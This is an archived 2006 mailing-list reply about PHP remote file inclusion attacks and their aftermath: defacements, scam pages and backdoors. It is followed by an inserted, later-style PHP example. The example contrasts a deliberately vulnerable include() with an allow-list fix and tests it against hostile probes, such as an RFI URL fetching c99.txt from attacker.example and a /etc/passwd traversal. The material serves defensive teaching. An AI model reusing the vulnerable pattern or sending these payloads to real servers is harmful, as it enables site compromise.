Re: Remote File Include Vulns (Are you testing for it, are you teaching it)

From: espen@multigeeks.com
Date: Mon Oct 16 2006 - 17:37:15 EDT


Quoting Joseph McCray <joe@learnsecurityonline.com>:

> I've been spending a lot of time googling these php shells (c99/r57 et
> al) lately. It appears that people are getting these on servers via
> Remote File Include vulnerabilities.
>
> I'm curious how many auditors are 1) testing for this stuff in your
> audits. Tons of blog, forum, and wiki packages have these vulns - are
> you guys testing for this stuff, and more importantly are you finding it
> vuln in your audits?
>
>
> --
> Joe McCray
> Toll Free: 1-866-892-2132
> Email: joe@learnsecurityonline.com
> Web: https://www.learnsecurityonline.com
>
>
> Learn Security Online, Inc.
>
> * Security Games * Simulators
> * Challenge Servers * Courses
> * Hacking Competitions * Hacklab Access
>

Hi Joe,

Remote file inclusion (RFI) has become a huge problem and security gap
over the last couple of years, so I believe this is something that
needs to be taken seriously. These vulnerabilities are very easy to exploit;
I see them being exploited pretty often, usually by script kiddies whose
goal is to deface the site, but often also to dump forum databases etc.

To give you a little example of this, my brother owns a site which was
vulnerable to RFI. Someone exploited this and set up a paypal scam
site. Luckily enough, the web host suspended the page temporarily to
let him clean up the mess.

Also, when the web server has writable directories, it is easy for
the attacker to upload different kinds of (malicious?) stuff, usually
backdoors, trojans, psybncs/eggdrops etc. As you probably understand,
a lot of these boxes are being used for DDoSing purposes etc.
Another thing that helps the attacker: safe mode being set to off.

As I've mentioned earlier, I believe this is something to *really*
take seriously, especially while performing pen-tests.

Excuse my English.

Regards,
Espen D.
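The pattern behind the RFI bugs discussed in this thread, shown as an added example rather than code from either poster: a PHP page that builds an include path from a request parameter, next to a hardened version that resolves the request against a fixed allow-list. The parameter name `page`, the `pages/` directory and the page names in the allow-list are assumptions made for the illustration.

```php
<?php
// Added example (not from the original post). Parameter name "page",
// the pages/ directory and the allow-list entries are assumptions.

// --- Vulnerable: the classic RFI pattern ---------------------------------
// When include() receives a URL and the interpreter is allowed to open
// remote streams (allow_url_fopen, and since PHP 5.2.0 also
// allow_url_include), a request such as
//     ?page=http://attacker.example/c99.txt?
// makes the server fetch and execute the attacker's script. This is how
// the c99/r57 shells mentioned in the thread get dropped on a box.
function render_vulnerable(string $page): void
{
    include $page . '.php';   // attacker controls the whole path
}

// --- Hardened: resolve the request against a fixed allow-list -------------
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Pure decision function: does the request name one of our own pages?
// Strict comparison against a closed list rejects URLs, stream wrappers
// (php://, data://), traversal sequences and null bytes in one step.
function is_allowed_page(string $requested): bool
{
    return in_array($requested, ALLOWED_PAGES, true);
}

// Maps an allowed name to an on-disk file and double-checks that the
// resolved path stays inside the pages/ directory. Returns null when the
// name is not allowed or the file does not exist.
function resolve_page(string $requested): ?string
{
    if (!is_allowed_page($requested)) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/pages/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;   // defence in depth: never include anything outside pages/
    }
    return $path;
}

function render_hardened(string $requested): void
{
    $path = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo "no such page\n";
        return;
    }
    include $path;
}

// Self-check of the allow-list against the kind of payloads seen in RFI
// scans (constructed inputs; no files are needed for this part).
$probes = [
    'home',                               // legitimate
    'http://attacker.example/c99.txt?',   // classic RFI payload
    '../../../etc/passwd%00',             // traversal plus null byte
    'php://input',                        // stream wrapper
    'data://text/plain;base64,PD9waHA=',  // data wrapper
];
foreach ($probes as $p) {
    printf("%-38s => %s\n", $p, is_allowed_page($p) ? 'allowed' : 'rejected');
}
```

Run it with `php rfi_example.php`: only `home` is reported as allowed, every other probe is rejected before any file system or network access happens. Independently of the code fix, the relevant php.ini knobs for the era the post describes are `allow_url_include = Off` (available from PHP 5.2.0) and, where it can be tolerated, `allow_url_fopen = Off`; note that `safe_mode`, which the post mentions, was deprecated in PHP 5.3 and removed in 5.4, so it cannot be relied on as a control.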




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:13 EDT